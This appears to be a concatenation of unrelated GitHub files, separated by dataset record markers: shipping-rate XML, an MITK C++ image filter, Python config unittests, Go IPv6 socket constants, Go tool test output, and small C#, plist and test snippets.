<product id="1040" sequence="1">
<name>Priority Courier</name>
<rate>40.28</rate>
<shippingDate>2010-08-03</shippingDate>
<deliveryDate>2010-08-04</deliveryDate>
<deliveryDayOfWeek>4</deliveryDayOfWeek>
<nextDayAM>true</nextDayAM>
<packingID>P_0</packingID>
</product>
<product id="1020" sequence="2">
<name>Expedited</name>
<rate>17.16</rate>
<shippingDate>2010-08-03</shippingDate>
<deliveryDate>2010-08-04</deliveryDate>
<deliveryDayOfWeek>4</deliveryDayOfWeek>
<nextDayAM>false</nextDayAM>
<packingID>P_0</packingID>
</product>
<product id="1010" sequence="3">
<name>Regular</name>
<rate>17.16</rate>
<shippingDate>2010-08-03</shippingDate>
<deliveryDate>2010-08-06</deliveryDate>
<deliveryDayOfWeek>6</deliveryDayOfWeek>
<nextDayAM>false</nextDayAM>
<packingID>P_0</packingID>
</product>
<packing>
<packingID>P_0</packingID>
<box>
<name>Small Box</name>
<weight>1.691</weight>
<expediterWeight>1.691</expediterWeight>
<length>25.0</length>
<width>17.0</width>
<height>16.0</height>
<packedItem>
<quantity>1</quantity>
<description>KAO Diskettes</description>
</packedItem>
</box>
<box>
<name>My Ready To Ship Item</name>
<weight>2.0</weight>
<expediterWeight>1.5</expediterWeight>
<length>30.0</length>
<width>20.0</width>
<height>20.0</height>
<packedItem>
<quantity>1</quantity>
<description>My Ready To Ship Item</description>
</packedItem>
</box>
</packing>
<shippingOptions>
<insurance>No</insurance>
<deliveryConfirmation>No</deliveryConfirmation>
<signature>No</signature>
</shippingOptions>
<comment/>
</ratesAndServicesResponse>
</eparcel>
<!--END_OF_EPARCEL-->
| {
"pile_set_name": "Github"
} |
/*============================================================================
The Medical Imaging Interaction Toolkit (MITK)
Copyright (c) German Cancer Research Center (DKFZ)
All rights reserved.
Use of this source code is governed by a 3-clause BSD license that can be
found in the LICENSE file.
============================================================================*/
#include "mitkTemporalJoinImagesFilter.h"
#include <numeric>
#include "mitkArbitraryTimeGeometry.h"
#include "mitkImageReadAccessor.h"
#include "mitkTemporoSpatialStringProperty.h"
void mitk::TemporalJoinImagesFilter::SetMaxTimeBounds(const TimeBoundsVectorType& timeBounds)
{
m_MaxTimeBounds = timeBounds;
this->Modified();
}
void mitk::TemporalJoinImagesFilter::GenerateInputRequestedRegion()
{
Superclass::GenerateInputRequestedRegion();
const auto nrOfInputs = this->GetNumberOfInputs();
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
this->GetInput(pos)->SetRequestedRegionToLargestPossibleRegion();
}
}
void mitk::TemporalJoinImagesFilter::GenerateOutputInformation()
{
mitk::Image::ConstPointer input = this->GetInput();
mitk::Image::Pointer output = this->GetOutput();
const auto nrOfInputs = this->GetNumberOfInputs();
auto timeBounds = m_MaxTimeBounds;
if (timeBounds.empty())
{
timeBounds.resize(nrOfInputs);
std::iota(timeBounds.begin(), timeBounds.end(), 1.0);
}
else if(timeBounds.size() != nrOfInputs)
{
mitkThrow() << "User defined max time bounds do not match the number if inputs (" << nrOfInputs << "). Size of max timebounds is " << timeBounds.size() << ", but it should be " << nrOfInputs << ".";
}
timeBounds.insert(timeBounds.begin(), m_FirstMinTimeBound);
auto timeGeo = mitk::ArbitraryTimeGeometry::New();
timeGeo->ReserveSpaceForGeometries(nrOfInputs);
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
timeGeo->AppendNewTimeStepClone(this->GetInput(pos)->GetGeometry(), timeBounds[pos], timeBounds[pos + 1]);
}
output->Initialize(input->GetPixelType(), *timeGeo);
auto newPropList = input->GetPropertyList()->Clone();
for (DataObjectPointerArraySizeType pos = 1; pos < nrOfInputs; ++pos)
{
const auto otherList = this->GetInput(pos)->GetPropertyList();
for (const auto& key : otherList->GetPropertyKeys())
{
auto prop = newPropList->GetProperty(key);
if (prop == nullptr)
{
newPropList->SetProperty(key, otherList->GetProperty(key)->Clone());
}
else
{
auto tempoSpatialProp = dynamic_cast<mitk::TemporoSpatialStringProperty*>(prop);
auto oTempoSpatialProp = dynamic_cast<mitk::TemporoSpatialStringProperty*>(otherList->GetProperty(key));
if (prop != nullptr && oTempoSpatialProp != nullptr)
{
auto availabelSlices = oTempoSpatialProp->GetAvailableSlices(0);
for (const auto& sliceID : availabelSlices)
{
tempoSpatialProp->SetValue(pos, sliceID, oTempoSpatialProp->GetValueBySlice(sliceID));
}
}
//other prop types can be ignored, we only use the values of the first frame.
}
}
}
output->SetPropertyList(newPropList);
}
void mitk::TemporalJoinImagesFilter::GenerateData()
{
mitk::Image::Pointer output = this->GetOutput();
mitk::Image::ConstPointer refInput = this->GetInput();
const auto nrOfInputs = this->GetNumberOfInputs();
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
if (!Equal(*(refInput->GetGeometry()), *(this->GetInput(pos)->GetGeometry()), mitk::eps, false))
{
mitkThrow() << "Cannot fuse images. At least image #" << pos << " has another geometry than the first image.";
}
if (refInput->GetPixelType() != this->GetInput(pos)->GetPixelType())
{
mitkThrow() << "Cannot fuse images. At least image #" << pos << " has another pixeltype than the first image.";
}
}
for (DataObjectPointerArraySizeType pos = 0; pos < nrOfInputs; ++pos)
{
mitk::ImageReadAccessor accessor(this->GetInput(pos));
output->SetVolume(accessor.GetData(), pos);
}
}
| {
"pile_set_name": "Github"
} |
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* Author : Rob Day - 11 May 2014
*/
#define GLOBALS_FULL_DEFINITION
#include "sipp.hpp"
#include "gtest/gtest.h"
#include "gmock/gmock.h"
#include <string.h>
namespace testing {
std::string FLAGS_gmock_verbose = "verbose";
}
int main(int argc, char* argv[])
{
globalVariables = new AllocVariableTable(NULL);
userVariables = new AllocVariableTable(globalVariables);
main_scenario = new scenario(0, 0);
::testing::InitGoogleTest(&argc, argv);
return RUN_ALL_TESTS();
}
/* Quickfix to fix unittests that depend on sipp_exit availability,
* now that sipp_exit has been moved into sipp.cpp which is not
* included. */
void sipp_exit(int rc, int rtp_errors, int echo_errors)
{
exit(rc);
}
| {
"pile_set_name": "Github"
} |
# Locally calculated
sha256 756e291d4f557d88cd50c4fe3b8454ec238362d22cedb3e6173240d90f0a80fa webrtc-audio-processing-0.3.tar.xz
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
import unittest
import random
import sys
sys.path.append('../pybingwallpaper')
import config
from config import ConfigParameter
from config import ConfigDatabase
from config import CommandLineArgumentsLoader
from config import DefaultValueLoader
from config import ConfigFileLoader
from config import ConfigFileDumper
from config import Namespace
def getdb():
return ConfigDatabase('test1', description='test desc')
# TODO: Add cases to test loader_srcs option
class TestConfigureParameter(unittest.TestCase):
def setUp(self):
pass
def test_import_config_module(self):
self.assertIsNotNone(ConfigParameter)
self.assertIsNotNone(ConfigDatabase)
def test_init_param(self):
p = ConfigParameter('test1')
self.assertIsNotNone(p)
def test_name(self):
names = ['klb', '1ab', 's#a']
for n in names:
p = ConfigParameter(name = n)
self.assertEqual(p.name, n)
def test_invalid_name(self):
names = ['k b', '\tab', 's\na']
for n in names:
with self.assertRaises(ValueError, msg="parameter name can't contain space"):
ConfigParameter(name = n)
class TestConfigureDatabase(unittest.TestCase):
def setUp(self):
pass
def test_prog(self):
db = getdb()
self.assertEqual(db.prog, 'test1')
def test_desc(self):
db = ConfigDatabase('test1', 'a test database')
self.assertEqual(db.prog, 'test1')
self.assertEqual(db.description, 'a test database')
def test_parameter_init(self):
params = [
ConfigParameter('123'),
ConfigParameter('456')
]
db = ConfigDatabase('test1', parameters=params)
self.assertListEqual(db.parameters, params)
def test_repr(self):
params = [
ConfigParameter('123', type=''),
ConfigParameter('456', type='')
]
db = ConfigDatabase('test1', description='test desc', parameters=params)
dbcopy = eval(repr(db))
self.assertEqual(db.prog, dbcopy.prog)
self.assertEqual(db.description, dbcopy.description)
self.assertListEqual(db.parameters, dbcopy.parameters)
def test_add_parameters(self):
params = [
ConfigParameter('123'),
ConfigParameter('456')
]
new_param = ConfigParameter('789')
db = ConfigDatabase('test1', description='test desc', parameters=params)
self.assertListEqual(db.parameters, params)
db.add_param(new_param)
self.assertListEqual(db.parameters, params+[new_param,])
def test_no_dup_param(self):
params = [
ConfigParameter('123', type=int),
ConfigParameter('456', defaults=9)
]
new_param = ConfigParameter('123')
db = ConfigDatabase('test1', description='test desc', parameters=params)
self.assertListEqual(db.parameters, params)
with self.assertRaises(NameError, msg='duplicated parameter name "%s" found'%(new_param.name,)):
db.add_param(new_param)
self.assertListEqual(db.parameters, params)
class TestCliLoader(unittest.TestCase):
def getdb(self):
return ConfigDatabase('test1', description='test desc')
def getloader(self):
return CommandLineArgumentsLoader()
def test_invalid_arg(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param1', type=int)
db.add_param(p)
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--not-exist'])
self.assertEqual(se.exception.code, 2)
def test_version(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='notused', loader_opts={'cli':{
'action': 'version',
'flags':('-v','--version'),
'version': 'test-version-1234'
}})
db.add_param(p)
with self.assertRaises(SystemExit) as se:
loader.load(db, ['-v'])
self.assertEqual(se.exception.code, 0)
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--version'])
self.assertEqual(se.exception.code, 0)
def test_name(self):
db = getdb()
cli_opts = {'flags':['-p']}
p = ConfigParameter(name='param1', type=lambda s:int(s,0), loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--param1', '1'])
self.assertEqual(se.exception.code, 2)
ans = loader.load(db, ['-p', '1'])
self.assertEqual(getattr(ans, p.name), 1)
def test_load_int(self):
ds = [
('0', 0),
('0x1aedead0b', 0x1aedead0b),
('0b0011', 3),
('-9571293', -9571293),
]
db = getdb()
p = ConfigParameter(name='param1', type=lambda s:int(s,0))
db.add_param(p)
loader = self.getloader()
for s, d in ds:
ans = loader.load(db, ['--param1', s])
self.assertEqual(getattr(ans, p.name), d)
def test_load_str(self):
ds = [
' ',
'#123',
'as_',
'9 9'
]
db = getdb()
p = ConfigParameter(name='param1')
db.add_param(p)
loader = self.getloader()
for s in ds:
ans = loader.load(db, ['--param1', s])
self.assertEqual(getattr(ans, p.name), s)
def test_load_choice(self):
good = ['c1', 'c3', 'c2']
choices = ('c0', 'c1', 'c2', 'c3')
db = getdb()
p = ConfigParameter(name='param1', defaults='c1', choices=choices)
db.add_param(p)
loader = self.getloader()
# try legal ones
for s in good:
ans = loader.load(db, ['--param1', s], generate_default=True)
self.assertEqual(getattr(ans, p.name), s)
# test use default
ans = loader.load(db, [], generate_default=True)
self.assertEqual(getattr(ans, p.name), good[0])
# test illegal value
with self.assertRaises(SystemExit) as se:
loader.load(db, ['--param1', 'no-good'], generate_default=True)
self.assertEqual(se.exception.code, 2)
def test_load_true(self):
cli_opts = {'action':'store_true'}
db = getdb()
p = ConfigParameter(name='param1', defaults=False, loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
ans = loader.load(db, ['--param1'])
self.assertTrue(getattr(ans, p.name))
ans = loader.load(db, [])
self.assertFalse(hasattr(ans, p.name))
ans = loader.load(db, [], generate_default=True)
self.assertFalse(getattr(ans, p.name))
def test_load_false(self):
cli_opts = {'action':'store_false'}
db = getdb()
p = ConfigParameter(name='param1', defaults=True, loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
ans = loader.load(db, ['--param1'])
self.assertFalse(getattr(ans, p.name))
ans = loader.load(db, [], generate_default=True)
self.assertTrue(getattr(ans, p.name))
def test_load_count(self):
cli_opts = {'action':'count'}
db = getdb()
p = ConfigParameter(name='d', defaults=0, loader_opts={'cli':cli_opts})
db.add_param(p)
loader = self.getloader()
ans = loader.load(db, ['-d'], generate_default=True)
self.assertEqual(getattr(ans, p.name), 1)
ans = loader.load(db, [], generate_default=True)
self.assertEqual(getattr(ans, p.name), 0)
ans = loader.load(db, ['-d', '-d', '-d'], generate_default=True)
self.assertEqual(getattr(ans, p.name), 3)
c = random.randint(0, 256)
ans = loader.load(db, ['-'+'d'*c], generate_default=True)
self.assertEqual(getattr(ans, p.name), c)
class TestDefaultValueLoader(unittest.TestCase):
def getloader(self, platform=None):
return DefaultValueLoader(platform)
def test_load_plain_def(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='intparam', defaults=0)
db.add_param(p)
p = ConfigParameter(name='strparam', defaults='blah blah blah')
db.add_param(p)
p = ConfigParameter(name='noneparam')
db.add_param(p)
ans = loader.load(db)
self.assertEqual(ans.intparam, 0)
self.assertEqual(ans.strparam, 'blah blah blah')
self.assertIsNone(ans.noneparam)
def test_load_cur_platform(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param', defaults={sys.platform:'myval', '*':'otherval'})
db.add_param(p)
ans = loader.load(db)
self.assertEqual(ans.param, 'myval')
def test_load_other_platform(self):
defs = {
'linux': 'linuxval',
'win': 'win32val',
'*': 'otherval'
}
db = getdb()
p = ConfigParameter(name='param', defaults=defs)
db.add_param(p)
loader = self.getloader('linux')
ans = loader.load(db)
self.assertEqual(ans.param, 'linuxval')
loader = self.getloader('darwin')
ans = loader.load(db)
self.assertEqual(ans.param, 'otherval')
loader = self.getloader('win')
ans = loader.load(db)
self.assertEqual(ans.param, 'win32val')
def test_load_with_type(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param', type=lambda x:int(x,0), defaults='0xffff')
db.add_param(p)
ans = loader.load(db)
self.assertEqual(type(ans.param), int)
self.assertEqual(ans.param, 0xffff)
def test_load_overwrite(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='param', defaults='defval')
db.add_param(p)
ans = loader.load(db)
self.assertEqual(ans.param, 'defval')
ans.param = 'modified'
self.assertEqual(ans.param, 'modified')
from io import StringIO
class TestConfigFileLoader(unittest.TestCase):
def setUp(self):
self.config_file = StringIO('''
[DEFAULT]
# default section values
topParam1 = 1
topParam2 = "s-value"
topParam3 =
[section1]
secParam1 = 1 2 3
secParam2 =
[section3]
secParam2 = somevalue
''')
def getloader(self):
return ConfigFileLoader()
def test_load_plain_value(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='topParam1')
db.add_param(p)
p = ConfigParameter(name='topParam2')
db.add_param(p)
p = ConfigParameter(name='topParam3')
db.add_param(p)
p = ConfigParameter(name='topParamx')
db.add_param(p)
ans = loader.load(db, self.config_file)
self.assertEqual(ans.topParam1, '1')
self.assertEqual(ans.topParam2, '"s-value"')
self.assertEqual(ans.topParam3, '')
self.assertFalse(hasattr(ans, 'topParamx'))
def test_load_type_cast(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='topParam1', type=int)
db.add_param(p)
p = ConfigParameter(name='topParam2', type=None)
db.add_param(p)
p = ConfigParameter(name='topParamx', type=float)
db.add_param(p)
ans = loader.load(db, self.config_file)
self.assertEqual(type(ans.topParam1), int)
self.assertEqual(ans.topParam1, 1)
self.assertEqual(type(ans.topParam2), str)
self.assertEqual(ans.topParam2, '"s-value"')
self.assertFalse(hasattr(ans, 'topParamx'))
def test_config_section(self):
loader = self.getloader()
db = getdb()
getSection = lambda secname: {'section': secname}
p = ConfigParameter(name='topParam2', loader_opts={'conffile':getSection(None)})
db.add_param(p)
p = ConfigParameter(name='secParam1', loader_opts={'conffile':getSection('section1')})
db.add_param(p)
p = ConfigParameter(name='secParam2', loader_opts={'conffile':getSection('section3')})
db.add_param(p)
p = ConfigParameter(name='secParamx', loader_opts={'conffile':getSection('sectionx')})
db.add_param(p)
ans = loader.load(db, self.config_file)
self.assertEqual(ans.topParam2, '"s-value"')
self.assertEqual(ans.secParam1, '1 2 3')
self.assertEqual(ans.secParam2, 'somevalue')
self.assertFalse(hasattr(ans, 'topParamx'))
def test_load_default(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='topParam3', defaults='def-1')
db.add_param(p)
p = ConfigParameter(
name='secParamx',
type=float, defaults='0',
loader_opts={'conffile':{'section':'section3'}}
)
db.add_param(p)
ans = loader.load(db, self.config_file, generate_default=True)
self.assertEqual(ans.topParam3, '')
self.assertEqual(type(ans.secParamx), float)
self.assertEqual(ans.secParamx, float(0))
class TestConfigFileDumper(unittest.TestCase):
def setUp(self):
self.conf = Namespace()
choices = ['cal1', 'cal2', 'cal3']
setattr(self.conf, 'intparam', 0x77992213)
setattr(self.conf, 'strparam', 'a complicat3d string#!')
setattr(self.conf, 'trueparam', True)
setattr(self.conf, 'falseparam', False)
setattr(self.conf, 'choiceparam', choices[1])
self.db = getdb()
p = ConfigParameter(name='intparam', type=int)
self.db.add_param(p)
p = ConfigParameter(name='strparam', type=str)
self.db.add_param(p)
p = ConfigParameter(name='trueparam', type=bool,
loader_opts={'conffile':{'section':'section_1'}})
self.db.add_param(p)
p = ConfigParameter(name='falseparam', type=bool,
loader_opts={'conffile':{
'converter':lambda x: True if bool(x) and x.lower() != 'false' else False
}})
self.db.add_param(p)
p = ConfigParameter(name='choiceparam', choices=choices)
self.db.add_param(p)
def getloader(self):
return ConfigFileLoader()
def getdumper(self):
return ConfigFileDumper()
def test_dump_config(self):
buf = StringIO()
loader = self.getloader()
dumper = self.getdumper()
ret = dumper.dump(self.db, self.conf, buf)
self.assertNotEqual(ret, 0)
buf.seek(0)
ans = loader.load(self.db, buf)
for k, v in vars(self.conf).items():
self.assertTrue(hasattr(ans, k))
self.assertEqual(type(getattr(ans, k)), type(v))
self.assertEqual(getattr(ans, k), v)
self.assertEqual(ans, self.conf)
class TestOtherUtil(unittest.TestCase):
def test_merge(self):
ns1 = Namespace()
ns2 = Namespace()
ns1.param1 = 123
ns2.param1 = 456
ns1.parama = 'a'
ns2.paramb = ('1', 2, 's')
ans = config.merge_config(ns1, ns2)
self.assertEqual(ns1.param1, 123)
self.assertEqual(ns2.param1, 456)
self.assertEqual(ans.param1, 456)
self.assertEqual(ns1.parama, 'a')
self.assertFalse(hasattr(ns2, 'parama'))
self.assertEqual(ans.parama, 'a')
self.assertFalse(hasattr(ns1, 'paramb'))
self.assertEqual(ns2.paramb, ('1', 2, 's'))
self.assertEqual(ans.paramb, ('1', 2, 's'))
| {
"pile_set_name": "Github"
} |
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs defs_linux.go
package ipv6
const (
sysIPV6_ADDRFORM = 0x1
sysIPV6_2292PKTINFO = 0x2
sysIPV6_2292HOPOPTS = 0x3
sysIPV6_2292DSTOPTS = 0x4
sysIPV6_2292RTHDR = 0x5
sysIPV6_2292PKTOPTIONS = 0x6
sysIPV6_CHECKSUM = 0x7
sysIPV6_2292HOPLIMIT = 0x8
sysIPV6_NEXTHOP = 0x9
sysIPV6_FLOWINFO = 0xb
sysIPV6_UNICAST_HOPS = 0x10
sysIPV6_MULTICAST_IF = 0x11
sysIPV6_MULTICAST_HOPS = 0x12
sysIPV6_MULTICAST_LOOP = 0x13
sysIPV6_ADD_MEMBERSHIP = 0x14
sysIPV6_DROP_MEMBERSHIP = 0x15
sysMCAST_JOIN_GROUP = 0x2a
sysMCAST_LEAVE_GROUP = 0x2d
sysMCAST_JOIN_SOURCE_GROUP = 0x2e
sysMCAST_LEAVE_SOURCE_GROUP = 0x2f
sysMCAST_BLOCK_SOURCE = 0x2b
sysMCAST_UNBLOCK_SOURCE = 0x2c
sysMCAST_MSFILTER = 0x30
sysIPV6_ROUTER_ALERT = 0x16
sysIPV6_MTU_DISCOVER = 0x17
sysIPV6_MTU = 0x18
sysIPV6_RECVERR = 0x19
sysIPV6_V6ONLY = 0x1a
sysIPV6_JOIN_ANYCAST = 0x1b
sysIPV6_LEAVE_ANYCAST = 0x1c
sysIPV6_FLOWLABEL_MGR = 0x20
sysIPV6_FLOWINFO_SEND = 0x21
sysIPV6_IPSEC_POLICY = 0x22
sysIPV6_XFRM_POLICY = 0x23
sysIPV6_RECVPKTINFO = 0x31
sysIPV6_PKTINFO = 0x32
sysIPV6_RECVHOPLIMIT = 0x33
sysIPV6_HOPLIMIT = 0x34
sysIPV6_RECVHOPOPTS = 0x35
sysIPV6_HOPOPTS = 0x36
sysIPV6_RTHDRDSTOPTS = 0x37
sysIPV6_RECVRTHDR = 0x38
sysIPV6_RTHDR = 0x39
sysIPV6_RECVDSTOPTS = 0x3a
sysIPV6_DSTOPTS = 0x3b
sysIPV6_RECVPATHMTU = 0x3c
sysIPV6_PATHMTU = 0x3d
sysIPV6_DONTFRAG = 0x3e
sysIPV6_RECVTCLASS = 0x42
sysIPV6_TCLASS = 0x43
sysIPV6_ADDR_PREFERENCES = 0x48
sysIPV6_PREFER_SRC_TMP = 0x1
sysIPV6_PREFER_SRC_PUBLIC = 0x2
sysIPV6_PREFER_SRC_PUBTMP_DEFAULT = 0x100
sysIPV6_PREFER_SRC_COA = 0x4
sysIPV6_PREFER_SRC_HOME = 0x400
sysIPV6_PREFER_SRC_CGA = 0x8
sysIPV6_PREFER_SRC_NONCGA = 0x800
sysIPV6_MINHOPCOUNT = 0x49
sysIPV6_ORIGDSTADDR = 0x4a
sysIPV6_RECVORIGDSTADDR = 0x4a
sysIPV6_TRANSPARENT = 0x4b
sysIPV6_UNICAST_IF = 0x4c
sysICMPV6_FILTER = 0x1
sysICMPV6_FILTER_BLOCK = 0x1
sysICMPV6_FILTER_PASS = 0x2
sysICMPV6_FILTER_BLOCKOTHERS = 0x3
sysICMPV6_FILTER_PASSONLY = 0x4
sysSOL_SOCKET = 0x1
sysSO_ATTACH_FILTER = 0x1a
sizeofKernelSockaddrStorage = 0x80
sizeofSockaddrInet6 = 0x1c
sizeofInet6Pktinfo = 0x14
sizeofIPv6Mtuinfo = 0x20
sizeofIPv6FlowlabelReq = 0x20
sizeofIPv6Mreq = 0x14
sizeofGroupReq = 0x88
sizeofGroupSourceReq = 0x108
sizeofICMPv6Filter = 0x20
sizeofSockFprog = 0x10
)
type kernelSockaddrStorage struct {
Family uint16
X__data [126]int8
}
type sockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
}
type inet6Pktinfo struct {
Addr [16]byte /* in6_addr */
Ifindex int32
}
type ipv6Mtuinfo struct {
Addr sockaddrInet6
Mtu uint32
}
type ipv6FlowlabelReq struct {
Dst [16]byte /* in6_addr */
Label uint32
Action uint8
Share uint8
Flags uint16
Expires uint16
Linger uint16
X__flr_pad uint32
}
type ipv6Mreq struct {
Multiaddr [16]byte /* in6_addr */
Ifindex int32
}
type groupReq struct {
Interface uint32
Pad_cgo_0 [4]byte
Group kernelSockaddrStorage
}
type groupSourceReq struct {
Interface uint32
Pad_cgo_0 [4]byte
Group kernelSockaddrStorage
Source kernelSockaddrStorage
}
type icmpv6Filter struct {
Data [8]uint32
}
type sockFProg struct {
Len uint16
Pad_cgo_0 [6]byte
Filter *sockFilter
}
type sockFilter struct {
Code uint16
Jt uint8
Jf uint8
K uint32
}
| {
"pile_set_name": "Github"
} |
-------- @implements E --------
{
"type": {
"name": "implements-json.E",
"pos": "testdata/src/implements-json/main.go:10:6",
"kind": "interface"
}
}
-------- @implements F --------
{
"type": {
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
},
"to": [
{
"name": "*implements-json.C",
"pos": "testdata/src/implements-json/main.go:21:6",
"kind": "pointer"
},
{
"name": "implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "struct"
},
{
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
}
]
}
-------- @implements FG --------
{
"type": {
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
},
"to": [
{
"name": "*implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "pointer"
}
],
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
]
}
-------- @implements slice --------
{
"type": {
"name": "[]int",
"pos": "-",
"kind": "slice"
}
}
-------- @implements C --------
{
"type": {
"name": "implements-json.C",
"pos": "testdata/src/implements-json/main.go:21:6",
"kind": "basic"
},
"fromptr": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
]
}
-------- @implements starC --------
{
"type": {
"name": "*implements-json.C",
"pos": "testdata/src/implements-json/main.go:21:6",
"kind": "pointer"
},
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
]
}
-------- @implements D --------
{
"type": {
"name": "implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "struct"
},
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
],
"fromptr": [
{
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
}
]
}
-------- @implements starD --------
{
"type": {
"name": "*implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "pointer"
},
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
},
{
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
}
]
}
| {
"pile_set_name": "Github"
} |
from gunicorn.config import Config
from gunicorn.http.errors import LimitRequestHeaders
request = LimitRequestHeaders
cfg = Config()
cfg.set('limit_request_field_size', 98)
| {
"pile_set_name": "Github"
} |
using System.Web;
using System.Web.Mvc;
namespace Sample.WebApp
{
public class FilterConfig
{
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute());
}
}
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>IBClasses</key>
<array>
<dict>
<key>CLASS</key>
<string>SUWindowController</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>SUPERCLASS</key>
<string>NSWindowController</string>
</dict>
<dict>
<key>CLASS</key>
<string>NSApplication</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>SUPERCLASS</key>
<string>NSResponder</string>
</dict>
<dict>
<key>ACTIONS</key>
<dict>
<key>installUpdate</key>
<string>id</string>
<key>remindMeLater</key>
<string>id</string>
<key>skipThisVersion</key>
<string>id</string>
</dict>
<key>CLASS</key>
<string>SUUpdateAlert</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>OUTLETS</key>
<dict>
<key>delegate</key>
<string>id</string>
<key>description</key>
<string>NSTextField</string>
<key>releaseNotesView</key>
<string>WebView</string>
</dict>
<key>SUPERCLASS</key>
<string>SUWindowController</string>
</dict>
<dict>
<key>CLASS</key>
<string>FirstResponder</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>SUPERCLASS</key>
<string>NSObject</string>
</dict>
<dict>
<key>CLASS</key>
<string>NSObject</string>
<key>LANGUAGE</key>
<string>ObjC</string>
</dict>
</array>
<key>IBVersion</key>
<string>1</string>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
/Sequence
fib:{<0;1> {x,<x[-1]+x[-2]>}/ range[x]}
/nth
fibn:{fib[x][x]}
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.